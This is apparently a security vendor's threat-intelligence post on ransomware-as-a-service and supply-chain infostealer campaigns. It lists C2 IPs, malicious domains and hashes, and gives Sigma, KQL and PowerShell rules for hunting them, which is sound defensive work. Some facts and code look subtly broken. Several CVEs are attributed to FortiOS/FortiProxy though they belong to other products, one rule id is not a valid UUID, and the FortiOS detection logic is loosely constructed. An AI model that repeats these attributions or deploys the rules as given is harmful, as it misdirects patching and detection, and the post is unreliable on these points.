Back to Intelligence

The Gentlemen & LeakNet: RaaS Expansion and Infostealer Supply Chain Attack — OTX Pulse Analysis

SA
Security Arsenal Team
April 18, 2026
6 min read

Recent OTX Pulse data reveals a convergence of sophisticated RaaS operations and targeted supply chain compromises. We are tracking active campaigns by "The Gentlemen" threat actor, who has expanded their operations to include LockBit 5.0, Babuk, and Medusa ransomware families, primarily leveraging recent FortiOS and FortiProxy vulnerabilities (CVE-2024-37085, CVE-2025-32463) for initial access.

Simultaneously, the "LeakNet" actor is scaling operations by moving away from Initial Access Brokers (IABs) to self-managed campaigns utilizing "ClickFix" social engineering lures and a novel Deno-based in-memory loader to deliver ransomware. In a separate but critical campaign, the "Runningcrab" actor (associated with PlugX and Sogu malware families) is conducting a supply chain attack targeting users of "Cobra DocGuard" software, deploying the "Infostealer.Speagle" to exfiltrate sensitive data under the guise of legitimate software traffic.

The common objective across these pulses is data exfiltration followed by system encryption, with adversaries increasingly abusing legitimate tools (Deno, DocGuard) to bypass EDR controls.

Threat Actor / Malware Profile

The Gentlemen

  • Type: RaaS (Ransomware-as-a-Service)
  • Malware Families: Babuk (S0638), Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa.
  • Distribution: Exploitation of public-facing applications, specifically FortiOS/FortiProxy vulnerabilities.
  • Persistence/Behavior: Maintains a database of compromised devices; utilizes advanced defense evasion. Tactics include credential dumping and lateral movement typical of APT operations.
  • C2/Exfiltration: Standard ransomware C2 beacons; exfiltration prior to encryption.

Runningcrab / Infostealer.Speagle

  • Type: Nation-State / Espionage-aligned Infostealer
  • Malware Families: Infostealer.Speagle, PlugX (S0013), DestroyRAT, Korplug.
  • Distribution: Supply chain compromise via legitimate "Cobra DocGuard" software updates/installers.
  • Persistence/Behavior: Hijacks DocGuard functionality to mask communications. Collects sensitive system info and documents.
  • C2/Exfiltration: Transmits data to compromised Cobra DocGuard servers (IPs: 222.222.254.165, 60.30.147.18), making traffic appear as legitimate policy synchronization requests (/CDGServer3/CDGClientDiagnostics).

LeakNet

  • Type: Ransomware Operator
  • Distribution: ClickFix (fake browser update lures) on compromised websites.
  • Persistence/Behavior: Uses a Deno-based loader for in-memory execution to evade disk-based scanning. Post-exploitation involves side-loading jli.dll and lateral movement via PsExec.
  • Infrastructure: Uses compromised domains for infrastructure and S3 buckets for data staging.

IOC Analysis

The provided indicators require immediate operationalization across security stacks:

  • CVEs (The Gentlemen): CVE-2023-27532, CVE-2024-37085, CVE-2024-55591, CVE-2025-32463.
    • Action: Prioritize patching for Fortinet devices immediately. Use vulnerability scanners to detect unpatched FortiOS instances.
  • File Hashes (Multiple Actors): A mix of MD5, SHA1, and SHA256 hashes associated with LockBit, Babuk, Speagle, and PlugX.
    • Action: Block execution of these files on endpoints via EDR policies. Use YARA or hash sets to hunt for historical presence.
  • URLs/IPs (Runningcrab): Specific HTTP endpoints on ports 8090/8091.
    • Action: Block outbound traffic to 222.222.254.165 and 60.30.147.18 on non-standard ports. Inspect SSL traffic for the specific URI paths.
  • Domains (LeakNet): 8 domains identified (e.g., okobojirent.com, mshealthmetrics.com).
    • Action: Sinkhole or block DNS resolution for these domains. These are likely used for ClickFix redirection or C2.

Detection Engineering

YAML
---
title: FortiOS Potential Exploitation - The Gentlemen
id: 8c7a9b2e-5f4d-4a6e-9b1c-3d4e5f6a7b8c
description: Detects potential exploitation attempts against FortiOS devices associated with CVE-2024-37085 or CVE-2025-32463 used by The Gentlemen.
author: Security Arsenal
date: 2026/04/19
modified: 2026/04/19
status: experimental
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: firewall
detection:
    selection:
        dest_ip:
            - 'your_fortigate_management_ip' # Placeholder for actual asset IP
        src_ip|startswith:
            - '10.0.0.0' # Example internal range
        dest_port:
            - 443
            - 8443
    filter:
        http_method: 'POST'
        uri|contains:
            - '/api/v2/mon'
            - '/api/v2/cmdb'
    condition: selection and filter
falsepositives:
    - Legitimate administrative API calls
level: high
---
title: Cobra DocGuard Suspicious C2 Traffic - Speagle Infostealer
id: 9d8b0c3f-6g5e-5b7f-0c2d-4e5f6g7h8i9j
description: Detects connections to known Infostealer.Speagle C2 infrastructure mimicking DocGuard diagnostics.
author: Security Arsenal
date: 2026/04/19
status: experimental
tags:
    - attack.exfiltration
    - attack.t1041
logsource:
    category: proxy
detection:
    selection_ip:
        dest_ip:
            - '222.222.254.165'
            - '60.30.147.18'
    selection_uri:
        uri|contains: '/CDGServer3/CDGClientDiagnostics?flag=syn_user_policy'
    condition: 1 of selection*
falsepositives:
    - Legitimate DocGuard updates (rare on these specific IPs)
level: critical
---
title: Deno Based In-Memory Execution - LeakNet Loader
id: 0e1f2a3b-4c5d-6e7f-8a9b-0c1d2e3f4a5b
description: Detects the execution of Deno runtime with arguments suggesting script execution from the web, indicative of LeakNet ClickFix loader.
author: Security Arsenal
date: 2026/04/19
status: experimental
tags:
    - attack.execution
    - attack.t1059.006
logsource:
    category: process_creation
detection:
    selection_img:
        Image|endswith: '\deno.exe'
    selection_cli:
        CommandLine|contains:
            - 'run '
            - 'eval '
            - 'http://'
    condition: all of selection_*
falsepositives:
    - Developer usage of Deno
level: medium


kql
// Hunt for LeakNet ClickFix Domains and Runningcrab C2 IPs
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "okobojirent.com" 
   or RemoteUrl has "mshealthmetrics.com"
   or RemoteUrl has "serialmenot.com"
   or RemoteUrl has "neremedysoft.com"
   or RemoteUrl has "cnoocim.com"
   or RemoteUrl has "apiclofront.com"
   or RemoteUrl has "crahdhduf.com"
   or RemoteUrl has "delhedghogeggs.com"
   or RemoteIP in ("222.222.254.165", "60.30.147.18")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP


powershell
# PowerShell Hunt Script for Speagle and Ransomware File Hashes
# Define hashes from the OTX Pulse
$targetHashes = @(
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
    "51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2",
    "03298f85eaf8880222cf8a83b8ed75d90712c34a8a5299a60f47927ad044b43b",
    "d7f167cbf1676c14fd487219447e30fadf26885eb25ec4cafdeabe333bddf877",
    "dcd3f06093bf34d81837d837c5a5935beb859ba6258e5a80c3a5f95638a13d4d",
    "fad8d0307db5328c8b9f283a2cc6f7e4f4333001623fef5bd5c32a1c094bf890"
)

# Scanning common download and temp directories
$paths = @("C:\Users\", "C:\Windows\Temp\", "C:\ProgramData\")

Write-Host "[+] Hunting for known The Gentlemen and Speagle malware hashes..."

foreach ($path in $paths) {
    if (Test-Path $path) {
        Get-ChildItem -Path $path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $fileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($targetHashes -contains $fileHash) {
                Write-Host "[!] THREAT DETECTED: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}

Response Priorities

Immediate

  • Block IOCs: Push all listed domains and IP addresses to perimeter firewalls, secure web gateways, and EDR blocklists.
  • Patch FortiOS: Immediately apply patches for CVE-2024-37085 and CVE-2025-32463 on all Fortinet devices. Audit VPN logs for signs of brute forcing or exploitation.

24 Hours

  • Supply Chain Audit: Identify endpoints running "Cobra DocGuard". Network hunt for connections to the non-standard IP addresses listed in the Runningcrab pulse.
  • Memory Forensics: Scan endpoints for Deno-based processes or jli.dll side-loading activity indicative of LeakNet.

1 Week

  • Architecture Hardening: Implement strict URL filtering for "ClickFix" style lures (fake browser updates). Review software supply chain integrity for DocGuard and similar utilities.
  • Credential Reset: If Infostealer.Speagle activity is suspected, force a password reset for privileged accounts used on compromised machines.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptransomwaresupply-chainclickfixinfostealerfortios

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action